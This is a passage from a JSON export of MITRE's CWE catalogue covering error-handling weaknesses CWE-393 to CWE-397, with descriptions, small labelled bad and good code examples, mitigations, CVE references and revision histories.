Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Missing Error Status Code","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Report Error in Status Code","attr":{"@_Date":"2010-12-13"}}]}},"393":{"attr":{"@_ID":"393","@_Name":"Return of Wrong Status Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function or operation returns an incorrect return value or status code that does not indicate an error, but causes the product to modify its behavior based on the incorrect result.","Extended_Description":"This can lead to unpredictable behavior. If the function is used to make security-critical decisions or provide security-critical information, then the wrong status code can cause the software to assume that an action is safe, even when it is not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Alter Execution Logic"],"Note":"This weakness could place the system in a state that could lead unexpected logic to be executed or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, an HTTP 404 status code is returned in the event of an IOException encountered in a Java servlet. A 404 code is typically meant to indicate a non-existent resource and would be somewhat misleading in this case.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (IOException ioe) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// something that might throw IOException"}},{"#text":"response.sendError(SC_NOT_FOUND);","attr":{"@_style":"margin-left:10px;"}}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-1132","Description":"DNS server returns wrong response code for non-existent AAAA record, which effectively says that the domain is inaccessible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1132"},{"Reference":"CVE-2001-1509","Description":"Hardware-specific implementation of system call causes incorrect results from geteuid.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1509"},{"Reference":"CVE-2001-1559","Description":"System call returns wrong value, leading to a resultant NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1559"},{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wrong Status Code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Notes":{"Note":{"#text":"This can be primary or resultant, but it is probably most often primary to other issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Wrong Status Code","attr":{"@_Date":"2008-04-11"}}}},"394":{"attr":{"@_ID":"394","@_Name":"Unexpected Status Code or Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1395","Description":"Certain packets (zero byte and other lengths) cause a recvfrom call to produce an unexpected return code that causes a server\'s listening loop to exit.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1395"},{"Reference":"CVE-2002-2124","Description":"Unchecked return code from recv() leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2124"},{"Reference":"CVE-2005-2553","Description":"Kernel function does not properly handle when a null is returned by a function call, causing it to call another function that it shouldn\'t.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2553"},{"Reference":"CVE-2005-1858","Description":"Memory not properly cleared when read() function call returns fewer bytes than expected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858"},{"Reference":"CVE-2000-0536","Description":"Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0536"},{"Reference":"CVE-2001-0910","Description":"Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0910"},{"Reference":"CVE-2004-2371","Description":"Game server doesn\'t check return values for functions that handle text strings and associated size values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2371"},{"Reference":"CVE-2005-1267","Description":"Resultant infinite loop when function call returns -1 value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1267"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unexpected Status Code or Return Value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP00-PL","Entry_Name":"Do not return undef","Mapping_Fit":"Imprecise"}]},"Notes":{"Note":{"#text":"Usually primary, but can be resultant from issues such as behavioral change or API abuse. This can produce resultant vulnerabilities.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"395":{"attr":{"@_ID":"395","@_Name":"Use of NullPointerException Catch to Detect NULL Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.","Extended_Description":{"xhtml:p":["Programmers typically catch NullPointerException under three circumstances:","Of these three circumstances, only the last is acceptable."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The program contains a null pointer dereference. Catching the resulting exception was easier than fixing the underlying problem.","The program explicitly throws a NullPointerException to signal an error condition.","The code is part of a test harness that supplies unexpected input to the classes under test."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Framework-based Fuzzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not extensively rely on catching exceptions (especially for validating user input) to handle errors. Handling exceptions can decrease the performance of an application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code mistakenly catches a NullPointerException.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (NullPointerException npe) {}","xhtml:div":[{"#text":"mysteryMethod();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":""}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Catching NullPointerException"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Catch NullPointerException","attr":{"@_Date":"2008-04-11"}}}},"396":{"attr":{"@_ID":"396","@_Name":"Declaration of Catch for Generic Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.","Extended_Description":"Multiple catch blocks can get ugly and repetitive, but \\"condensing\\" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of Java\'s typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt handles three types of exceptions in an identical fashion.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}catch (InvocationTargetException e) {}catch (SQLException e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"doExchange failed\\", e);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logger.error(\\"doExchange failed\\", e);","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logger.error(\\"doExchange failed\\", e);","xhtml:br":""}}],"xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"try {}catch (Exception e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"doExchange failed\\", e);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"Body_Text":["At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows:","However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer\'s intent."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Overly-Broad Catch Block"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP5","Entry_Name":"Ambiguous Exception Type"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-396"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-396"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 9: Catching Exceptions." Page 157"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-396"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-396"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Overly-Broad Catch Block","attr":{"@_Date":"2008-04-11"}}}},"397":{"attr":{"@_ID":"397","@_Name":"Declaration of Throws for Generic Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.","Extended_Description":"Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java\'s exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following method throws three types of exceptions.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void doExchange() throws IOException, InvocationTargetException, SQLException {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"public void doExchange() throws Exception {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["While it might seem tidier to write","doing so hampers the caller\'s ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement."]},{"Intro_Text":"Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be throw.","Example_Code":{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"int myfunction() throw(std::exception) {}","xhtml:div":{"#text":"if (0) throw out_of_range();throw length_error();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"In the example above, the code declares that myfunction() can throw an exception of type \\"std::exception\\" thus hiding details about the possible derived exceptions that could potentially be thrown."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Overly-Broad Throws Declaration"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR07-J","Entry_Name":"Do not throw RuntimeException, Exception, or Throwable"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP5","Entry_Name":"Ambiguous Exception Type"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-397"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-397"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-397"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-397"}}]},"Notes":{"Note":{"#text":"For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later.","attr":{"@_Type":"Applicable Platform"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 